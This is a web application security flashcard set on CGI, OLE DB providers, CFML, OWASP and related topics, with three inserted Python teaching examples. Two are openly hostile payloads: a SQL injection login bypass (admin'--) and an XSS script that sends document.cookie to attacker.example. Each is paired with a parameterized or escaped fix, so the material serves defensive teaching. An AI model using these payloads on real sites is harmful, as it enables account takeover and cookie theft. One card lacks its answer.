quiz 10 Flashcards
OLE DB relies on connection strings that enable the application to access the data stored on an external device.
True
In Windows, IIS stands for _____
Internet Information Services
__ is the interface that describes how a Web server passes request data to an external program and returns that program's output to a Web browser.
CGI
___ represent(s) a comment in SQL.
Double hyphens (--)
Connecting to a VSAM database with OLE DB requires using ____ as the provider.
SNAOLEDB
Dynamic Web pages need special components for displaying information that changes depending on user input or information obtained from a back-end server. What kind of components can Web pages use to achieve this?
To do this, dynamic Web pages can use the <form> tag, Common Gateway Interface (CGI), Active Server Pages (ASP), PHP, ColdFusion, JavaScript, and database connection strings, such as those used with Open Database Connectivity (ODBC).
foundation of most Web applications
HTML
main role is passing data between a Web server and an external program whose output is sent to the Web browser
CGI
language developed by Microsoft
JScript
keeps attackers from knowing the directory structure on an IIS Web server
virtual directory
a Web server
Apache
stands for cross-site scripting flaw
XSS
helps beginning Web application security testers gain a better understanding of the areas covered in the OWASP top ten Web applications vulnerability list
WebGoat
tool for searching Web sites for CGI scripts that can be exploited
Cgi Scanner v1.4
GUI tool that can be downloaded free from Microsoft and is included in the IIS Resource Kit
Wfetch
JavaScript is a server-side scripting language that is embedded in an HTML Web page.
False
One of the best Web sites to find tools for hacking Web applications is ___
http://packetstormsecurity.org
Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
True
__ is one of the best tools for scanning the Web for systems with CGI vulnerabilities.
Cgiscan.c
SQL ____ involves the attacker supplying SQL commands when prompted to fill in a Web application field.
injection
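The two flashcards on the SQL comment marker and on SQL injection describe one attack: the attacker's input closes the string the developer opened and the double hyphen comments out the rest of the query. The following is an added example, not code from the original page; it builds a constructed users table in an in-memory SQLite database and contrasts the string-concatenated login query with a parameterized one. The table, the credentials and the function names are all assumptions made for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample data: one user in an in-memory SQLite database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'c0rrect-h0rse')")
    conn.commit()
    return conn


def build_query_vulnerable(username, password):
    """The query a naive login form builds by pasting fields into SQL."""
    return ("SELECT username FROM users WHERE username = '" + username +
            "' AND password = '" + password + "'")


def login_vulnerable(conn, username, password):
    """Runs the concatenated query. With username  admin'--  the query becomes
    ... WHERE username = 'admin'--' AND password = '...'
    and everything after -- is a comment, so the password check disappears."""
    row = conn.execute(build_query_vulnerable(username, password)).fetchone()
    return row is not None


def login_safe(conn, username, password):
    """Parameterized form: the driver sends the values separately from the
    SQL text, so quotes and -- inside them are data, never syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable("admin'--", "wrong"))
    print("vulnerable login with admin'-- :", login_vulnerable(db, "admin'--", "wrong"))
    print("safe login with admin'--       :", login_safe(db, "admin'--", "wrong"))
```

The classic `' OR '1'='1` payload works against the same concatenated query for a different reason: it does not need the comment, because the injected OR makes the WHERE clause true for every row. The parameterized version rejects both.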
A user can view the source code of a PHP file by using the browser’s “View Source” option.
False
CGI programs can be written in many different programming and scripting languages, such as C/C++, Perl, UNIX shells, Visual Basic, and FORTRAN.
True
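The cards on CGI above say it passes data between the Web server and the browser and that CGI programs can be written in almost any language; what the interface actually specifies is how the server hands the request to the program (environment variables plus the POST body on stdin) and how the program hands back the response (headers, a blank line, then the page on stdout). The following is an added example, not code from the original page: a minimal CGI program body in Python, with a helper so the same function can be exercised on constructed requests without a Web server. The parameter name `name` and the greeting page are assumptions for the demonstration.

```python
import html
import io
import os
import sys
from urllib.parse import parse_qs


def handle_cgi(environ, stdin):
    """Body of a CGI program.

    environ: the request as the Web server passes it (REQUEST_METHOD,
             QUERY_STRING, CONTENT_LENGTH, ...).
    stdin:   a binary stream carrying the POST body, if any.
    Returns the complete response text that the program would write to stdout
    and the server would relay to the browser.
    """
    method = environ.get("REQUEST_METHOD", "GET").upper()
    params = parse_qs(environ.get("QUERY_STRING", ""))
    if method == "POST":
        # Read exactly CONTENT_LENGTH bytes: a server does not send EOF on stdin.
        length = int(environ.get("CONTENT_LENGTH") or 0)
        body = stdin.read(length).decode("utf-8", errors="replace")
        params.update(parse_qs(body))
    name = params.get("name", ["stranger"])[0]
    # User-supplied data is reflected into the page, so it is escaped here
    # just as it would be in any other dynamic page.
    page = "<html><body><p>Hello, " + html.escape(name) + "</p></body></html>"
    return "Content-Type: text/html; charset=utf-8\r\n\r\n" + page


def run_request(environ, body=b""):
    """Convenience wrapper for offline use: feeds a constructed request in."""
    env = dict(environ)
    env.setdefault("CONTENT_LENGTH", str(len(body)))
    return handle_cgi(env, io.BytesIO(body))


def response_body(response):
    """Return only the page part of a CGI response (after the blank line)."""
    return response.split("\r\n\r\n", 1)[1]


if __name__ == "__main__":
    # When actually run under a Web server, the real environment and stdin
    # are used and the response goes to stdout.
    sys.stdout.write(handle_cgi(os.environ, sys.stdin.buffer))
```

Because the whole request arrives through the process environment and stdin, a CGI program is only as safe as its handling of those inputs: the language it is written in does not matter, the parsing and escaping do.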
CFML stands for _______________
ColdFusion Markup Language
What is OWASP?
Much like ISECOM, the Open Web Application Security Project (OWASP) is an open, not-for-profit foundation dedicated to finding and fighting the causes of software vulnerabilities. OWASP (www.owasp.org) publishes the Ten Most Critical Web Application Security Vulnerabilities paper (the OWASP Top Ten), which the Payment Card Industry (PCI) Data Security Standard references for its secure coding requirements.
Connecting to an MS SQL Server database with OLE DB requires using ____ as the provider.
SQLOLEDB
__, developed by Microsoft, is a set of interfaces that enable applications to access data stored in a database management system.
OLE DB
What is the main difference between HTML pages and Active Server Pages (ASP)?
The main difference between HTML pages and Active Server Pages (ASP) is that an HTML page is a fixed file, whereas with ASP the server builds the HTML document on the fly: when a user requests the page, the server runs the ASP code and generates the HTML at that moment.
In a(n) ____ flaw, a Web browser might carry out code sent from a Web site.
cross-site scripting
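The card above defines the flaw but not where it comes from: the server reflects user input into the page without encoding it, so the browser cannot tell the attacker's markup from the developer's. The following is an added example, not code from the original page; it shows the reflected case beside the fixed version and, as a caveat the card does not cover, that the correct encoding depends on where in the page the data lands. The search page, the payload and the function names are constructed for the demonstration.

```python
import html
from urllib.parse import urlsplit

# Constructed sample inputs: a benign search term and one carrying a script.
BENIGN_TERM = "cold fusion tags"
XSS_PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
               "+document.cookie</script>")


def render_results_vulnerable(term):
    """Reflects the user's term straight into the HTML: the XSS flaw.
    A browser that receives this page runs the script inside it."""
    return "<h1>Results for " + term + "</h1>"


def render_results_safe(term):
    """Same page with the term encoded for an HTML text context."""
    return "<h1>Results for " + html.escape(term) + "</h1>"


def render_search_box_safe(term):
    """Attribute context: quote=True (the default) also encodes ' and ",
    so the term cannot close value="" and append an onfocus= handler."""
    return '<input name="q" value="' + html.escape(term, quote=True) + '">'


def safe_href(url):
    """URL context: encoding alone does not stop a javascript: URL, because
    the browser treats href content as a URL, not as markup. Allow only
    http(s) and fall back to a harmless anchor otherwise."""
    scheme = urlsplit(url).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def page_contains_script(page):
    """Crude check used here to show the difference: is a raw <script tag present?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_results_vulnerable(XSS_PAYLOAD))
    print(render_results_safe(XSS_PAYLOAD))
    print(render_search_box_safe('" onfocus="alert(1)'))
    print(safe_href("javascript:alert(1)"))
```

A real application would get the same effect from its template engine's automatic escaping; the point of the three render functions is that text, attribute and URL contexts each need their own rule, and a filter that only strips the string `<script>` catches none of the attribute or URL cases.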
ColdFusion uses its own proprietary tags written in ____
CFML
The column tag in CFML is ____
Why should security professionals have at least a little knowledge about the Apache Web Server?
Apache Web Server is said to run on more than twice as many Web servers as IIS, so some familiarity with this Web server can be helpful in the security-testing profession. Apache has important advantages over the competition: It works in just about any *nix platform as well as in Windows, and it’s free.
What is VBScript?
Visual Basic Script (VBScript) is a scripting language developed by Microsoft. You can insert VBScript into your HTML Web pages to convert static Web pages into dynamic Web pages. The biggest advantage of using a scripting language is that you have the features of a full programming language at your disposal, and anyone with programming experience can start writing VBScript quickly. Note that client-side VBScript was only ever supported by Internet Explorer; other browsers ignore it.
The JavaScript getElementByld() function is a method defined by the ____ Document Object Model (DOM).
W3C
All CFML tags begin with “___
CF
What is ActiveX Data Objects (ADO)?
ActiveX Data Objects (ADO) is a programming interface for connecting a Web application to a database. ActiveX defines technologies that allow applications, such as Word or Excel, to interact with the Web. For example, you can place an Excel spreadsheet in a Web page.
Web servers use the ____ element in an HTML document to allow customers to submit information to the Web server.
<form>
What is ColdFusion?
ColdFusion is a server-side scripting language used to develop dynamic Web pages. Created by Allaire Corporation and now owned by Adobe Systems, Inc., ColdFusion integrates Web browser, Web server, and database technologies. It uses its own proprietary tags written in ColdFusion Markup Language (CFML), and Web applications written in CFML can also contain other client-side technologies, such as HTML and JavaScript.
Visual Basic Script (VBScript) is a scripting language developed by __
Microsoft
What can an attacker do after gaining control of a Web server?
After an attacker gains control of a Web server, he or she could do the following:
- Deface the Web site
- Destroy the company’s database or offer to sell its contents
- Gain control of user accounts
- Perform secondary attacks from the Web site
- Gain root access to other application servers that are part of network infrastructure
As a security professional, what should you do after identifying that a Web server you are testing is using PHP?
After you have identified the Web server as using PHP, use the methods you have learned in the book to investigate further for version-specific vulnerabilities. The example the book gives: several old versions of PHP running on Linux could be exploited through file uploads when Php.ini contained the line file_uploads=on. The setting itself only permits uploads; the weakness was in those versions' handling of uploaded multipart/form-data, which could let a remote attacker run arbitrary code with the privileges of the Web server process. The best solution is to upgrade to the latest version of PHP; if that is not possible, change the line to file_uploads=off. In either case, check the installed PHP version against current advisories rather than judging exposure from the .ini setting alone.
___ was originally used primarily on UNIX systems, but is used more widely now on many platforms, such as Macintosh and Windows
PHP
Connecting to a MySQL database with OLE DB requires using ____ as the provider.
MySQLProv
What is JavaScript?
A popular scripting language used to create dynamic HTML Web pages is JavaScript. JavaScript also has the power of a programming language. As with VBScript, you can branch, loop, test, and create functions and procedures within your HTML Web pages.
What is ODBC used for?
The ODBC interface allows an application to access data stored in a database management system (DBMS), such as Microsoft SQL Server, Oracle, or any system that can recognize and issue ODBC commands. Interoperability between back-end database management systems is a key feature of the ODBC interface, allowing application developers to focus on the application without worrying about any specific DBMS.
__________________ Web pages display the same information regardless of the time of day or the user who activates the page.
Static